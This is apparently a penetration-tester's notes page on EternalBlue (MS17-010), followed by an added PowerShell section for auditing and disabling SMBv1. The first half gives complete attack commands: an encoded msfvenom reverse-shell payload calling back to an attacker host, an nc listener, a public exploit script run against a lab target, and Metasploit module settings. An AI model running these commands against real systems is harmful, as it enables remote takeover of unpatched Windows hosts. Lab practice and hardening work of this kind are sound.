MS17-010

SMB Exploit MS17-010

Some tools for exploiting EternalBlue (MS17-010), the SMBv1 remote code execution vulnerability.

Exploiting MS17-010

```bash
# generate the reverse-shell payload (32-bit, encoded with shikata_ga_nai)
msfvenom -p windows/shell_reverse_tcp -f exe -o asuka.exe \
  -a x86 -e x86/shikata_ga_nai LHOST=192.168.100.1 LPORT=31337

# start the listener on the attacker host
nc -lvp 31337

# exploit the vulnerability and execute the payload on the target
git clone https://github.com/helviojunior/MS17-010
cd MS17-010
python send_and_execute.py target.lab asuka.exe

# in case the dependency is missing (the script runs under Python 2)
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip2 install impacket==0.9.22
```

Or, using Metasploit:

```bash
use exploit/windows/smb/ms17_010_eternalblue
show options
set LHOST 10.4.33.242    # attacker address
set RHOSTS 10.10.82.157  # target address
run
```
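The defender's counterpart to the steps above, added here as an example that is not part of the original notes: MS17-010 is only reachable through SMBv1, so auditing and disabling SMBv1 on the server removes the exposure. It assumes an elevated PowerShell on Windows 8.1 / Server 2012 R2 or newer (SmbShare and DISM modules available); the function names are my own.

```powershell
# Added example (not from the original notes): audit and harden SMBv1 on a
# Windows host. Run elevated on Windows 8.1 / Server 2012 R2 or later.

function Get-Smb1Exposure {
    # Server-side SMB1 flag as seen by the SMB server service
    $server = Get-SmbServerConfiguration
    # State of the SMB1 optional feature (client and server binaries)
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol `
        -ErrorAction SilentlyContinue
    # Sessions negotiated below SMB 2.0 reveal legacy clients that would break
    # once SMB1 is turned off; migrate those before disabling.
    $legacy = Get-SmbSession -ErrorAction SilentlyContinue |
        Where-Object { [version]$_.Dialect -lt [version]'2.0' }

    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        Smb1ServerEnabled = $server.EnableSMB1Protocol
        Smb1FeatureState  = if ($feature) { $feature.State } else { 'NotPresent' }
        LegacySessions    = @($legacy).Count
    }
}

function Disable-Smb1Server {
    param([switch]$RemoveFeature)
    # Refuse SMB1 at the server; SMB2/3 clients are unaffected.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    if ($RemoveFeature) {
        # Remove the SMB1 binaries entirely (takes effect after a reboot).
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart |
            Out-Null
    }
    # Return $true when the server no longer accepts SMB1
    return ((Get-SmbServerConfiguration).EnableSMB1Protocol -eq $false)
}

# Usage: audit first, then disable once LegacySessions is 0.
Get-Smb1Exposure | Format-List
# Disable-Smb1Server -RemoveFeature
```

Disabling SMBv1 does not replace installing the MS17-010 security update, but it blocks the protocol the exploit depends on while patching is scheduled.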

Last updated 8 months ago
